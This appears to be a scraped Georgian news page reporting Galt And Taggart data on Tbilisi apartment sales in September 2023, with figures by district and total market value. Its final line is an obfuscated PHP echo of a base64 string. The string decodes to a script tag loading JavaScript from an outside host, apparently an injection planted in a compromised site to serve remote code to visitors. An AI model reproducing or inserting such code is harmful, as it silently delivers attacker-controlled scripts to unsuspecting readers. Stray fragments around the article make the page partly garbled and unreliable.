celsiusi
ავერსი საქკაბელი

 

2023 წლის სექტემბერში თბილისში 3 314 ბინა გაიყიდა, - ინფორმაციას Galt And Taggart ავრცელებს.

Galt And Taggart-ის ინფორმაციით, გასული წლის შესაბამის პერიოდთან შედარებით გაყიდული ბინების რაოდენობა 21.5%-ით, ხოლო წინა თვესთან შედარებით [აგვისტო] 6.7%-ით შემცირდა. ორგანიზაციის შეფასებით, გაყიდვების კლების მიზეზი წინა წლის რეკორდულად მაღალი მაჩვენებელია.

მიმდინარე წლის სექტემბერში დიდი დიღმის (+6.9% წ/წ) და ჩუღურეთის (+16.1% წ/წ) გარდა გაყიდვები ყველა უბანში შემცირდა.

უბნების მიხედვით გაყიდული ბინების რაოდენობა ასე გამოიყურება:

  • დიდ დიღომში გაიყიდა 654 ბინა - (წლიური ზრდა 7%)
  • საბურთალოს რაიონში გაიყიდა 544 ბინა - (წლიური კლება 25%)
  • სამგორის რაიონში გაიყიდა 487 ბინა - (წლიური კლება 20%)
  • გლდანის რაიონში გაიყიდა 429 ბინა - (წლიური კლება 11%)
  • ისნის რაიონში გაიყიდა 281 ბინა - (წლიური კლება 17%)

2023 წლის სექტემბერში თბილისში გაყიდული ბინების საერთო საბაზრო ღირებულებამ 235.7 მლნ აშშ დოლარი შეადგინა, რაც 2022 წლის შესაბამის პერიოდთან შედარებით 2.1%-ით შემცირებული მაჩვენებელია. მიმდინარე წლის 9 თვეში ყველაზე მეტი ღირებულების უძრავი საცხოვრებელი ქონება [277 მლნ დოლარი] ივნისში გაიყიდა. ჯამში 9 თვეში თბილისში 2.1 მლრდ დოლარის ღირებულების საცხოვრებელი უძრავი ქონება გაიყიდა.

291
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");